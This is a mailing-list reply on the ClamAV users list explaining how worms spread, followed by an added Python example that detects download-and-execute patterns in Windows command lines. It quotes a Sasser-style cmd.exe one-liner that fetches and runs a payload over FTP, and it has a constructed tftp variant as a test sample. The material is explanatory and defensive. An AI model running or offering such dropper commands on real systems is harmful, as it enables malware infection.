On 6/9/05, Joanna Roman <[EMAIL PROTECTED]> wrote:
> What do you mean by attack here? Do you mean that the
> infected machines try to tftp malware to your machine?
> I just try to understand how malware is spread.
>
There are several ways malware can get a hook into your system:

- mail worms: the problem sits in front of the computer, clicking instead of thinking.
- browser exploits: they use a flaw in your web browser to execute a command and install malicious code.
- backdoors that mail worms such as MyDoom or Bagle leave behind: you can connect to them and upload code.
- remotely exploitable vulnerabilities: you can get a command shell on the remote system without any user interaction, and download and execute code.
- others (weak passwords on shares, britney_spears_nude.jpg.exe on Kazaa ...)

To use remotely exploitable vulnerabilities, the viruses have to 'scan' for vulnerable machines, meaning they try to connect to a machine on the port running the vulnerable service and send the malicious packets (shellcode).

There are several things a shellcode can do. It can crash the machine, but that does not help the virus to spread, as it has to try to send a copy of itself to the victim's machine. So the virus runs a little HTTP, FTP or TFTP server, serving only itself, and it tells the victim to download it by creating a Windows command shell, which it uses to download itself via TFTP or FTP, as Windows offers a TFTP or FTP client by default. If the file is served via HTTP, the shellcode has to make use of a WinAPI call like downloadurl() or something like that, as there is no command-line tool to download files via HTTP on Windows.

Example: this is used by the Sasser virus. It opens an FTP server on port 5554 and asks the victims to download it from this port.

    echo off&echo open 123.45.67.89 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 13108_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&13108_up.exe&echo off&del cmd.ftp&echo on

This creates a file "cmd.ftp" with the content

    open 123.45.67.89 5554
    anonymous
    bin
    get 13108_up.exe

and runs the ftp.exe program with the file as input:

    ftp -s:cmd.ftp

starts the downloaded file:

    13108_up.exe

and deletes the file 'cmd.ftp':

    del cmd.ftp

After successful transmission, it starts the binary on the remote computer. The transferred virus will install itself as a system service, create some registry keys, and scan for other vulnerable machines. Often viruses can exploit more than one weakness, to increase their chances.

To defend yourself ... patch your system, run a firewall (even better, run a router), run an AV scanner, think before clicking.

_______________________________________________
http://lurker.clamav.net/list/clamav-users.html
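A way to turn the download-and-execute pattern described in the mail above into detection logic, as an added example that is not part of the original message or of ClamAV: the Python below replays the "echo text>>file" segments of a cmd.exe one-liner to reconstruct the ftp script it would write, extracts the server, port and payload name from that script, and records whether the payload is executed and the script deleted afterwards. It also covers the tftp variant the mail mentions ("tftp -i host GET file"). The command lines it runs on are constructed samples: the Sasser-style line is the one quoted above, while the 10.0.0.5 tftp line and the benign ftp line are made up for this example. The regexes, the split_cmd helper and the Dropper type are this example's own, not anything from the mail.

```python
"""Extract download-and-execute indicators from a Windows cmd.exe command line.

Added example (not from the original mail): replays 'echo ...>>file' segments
to rebuild the ftp script that 'ftp -s:file' would consume, then reports the
server, port and payload. Also matches the 'tftp -i host GET file' form.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Dropper:
    transport: str            # "ftp" or "tftp"
    host: str
    port: int
    payload: str              # file fetched from the attacker's server
    script_name: Optional[str]  # ftp script file, None for tftp
    executes_payload: bool    # payload is run in a later command segment
    deletes_script: bool      # script file is removed afterwards


# 'echo <text>><file>' or 'echo <text>>><file>' (assumed shapes for this example)
ECHO_REDIRECT = re.compile(r'^echo\s+(.*?)\s*(>{1,2})\s*(\S+)$', re.I)
# 'ftp [-flags] -s:<script>'
FTP_SCRIPT = re.compile(r'\bftp(?:\.exe)?\s+(?:-\S+\s+)*-s:(\S+)', re.I)
# 'tftp [-i] <host> GET <file>'
TFTP_GET = re.compile(r'\btftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)', re.I)


def split_cmd(cmdline: str) -> List[str]:
    """Split a cmd.exe line on its command separators ('&', '&&', '||')."""
    return [s.strip() for s in re.split(r'&&|\|\||&', cmdline) if s.strip()]


def reconstruct_scripts(segments: List[str]) -> Dict[str, List[str]]:
    """Replay every echo-with-redirect segment into per-file line lists."""
    files: Dict[str, List[str]] = {}
    for seg in segments:
        m = ECHO_REDIRECT.match(seg)
        if not m:
            continue  # 'echo off', 'echo user' (no redirect) and non-echo commands
        text, op, name = m.group(1), m.group(2), m.group(3).lower()
        if op == '>':
            files[name] = []  # a single '>' truncates the file first
        files.setdefault(name, []).append(text)
    return files


def _executes(segments: List[str], start: int, payload: str) -> bool:
    """True if a segment after index `start` runs the payload (directly or via start)."""
    p = payload.lower()
    for seg in segments[start + 1:]:
        low = seg.lower()
        if low == p or low.startswith(p + ' ') or (low.startswith('start') and p in low):
            return True
    return False


def _deletes(segments: List[str], name: Optional[str]) -> bool:
    """True if some segment deletes the script file."""
    if name is None:
        return False
    return any(re.match(r'(del|erase)\b', s, re.I) and name in s.lower() for s in segments)


def find_dropper(cmdline: str) -> Optional[Dropper]:
    """Return the Dropper described by the command line, or None if no pattern matches."""
    segs = split_cmd(cmdline)
    scripts = reconstruct_scripts(segs)
    for i, seg in enumerate(segs):
        m = FTP_SCRIPT.search(seg)
        if not m:
            continue
        name = m.group(1).lower()
        host, port, payload = None, 21, None  # ftp 'open' defaults to port 21
        for line in scripts.get(name, []):
            o = re.match(r'open\s+(\S+)(?:\s+(\d+))?', line, re.I)
            if o:
                host, port = o.group(1), int(o.group(2) or 21)
            g = re.match(r'm?get\s+(\S+)', line, re.I)
            if g:
                payload = g.group(1)
        if host and payload:
            return Dropper('ftp', host, port, payload, name,
                           _executes(segs, i, payload), _deletes(segs, name))
    for i, seg in enumerate(segs):
        m = TFTP_GET.search(seg)
        if m:
            host, payload = m.group(1), m.group(2)
            return Dropper('tftp', host, 69, payload, None,
                           _executes(segs, i, payload), False)
    return None


# Constructed samples (not real captures). The first is the line quoted in the mail.
SASSER_STYLE = ('echo off&echo open 123.45.67.89 5554>>cmd.ftp&echo anonymous>>cmd.ftp'
                '&echo user&echo bin>>cmd.ftp&echo get 13108_up.exe>>cmd.ftp'
                '&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&13108_up.exe'
                '&echo off&del cmd.ftp&echo on')
TFTP_STYLE = 'tftp -i 10.0.0.5 GET 13108_up.exe&13108_up.exe'
BENIGN = 'cd C:\\temp & ftp ftp.example.org'

if __name__ == '__main__':
    for line in (SASSER_STYLE, TFTP_STYLE, BENIGN):
        print(find_dropper(line))
```

The same function can be run over the command-line field of process-creation logs; a hit where executes_payload is true and the host is not an internal FTP server is the "download itself, then run it" sequence the mail describes, whatever the payload happens to be called.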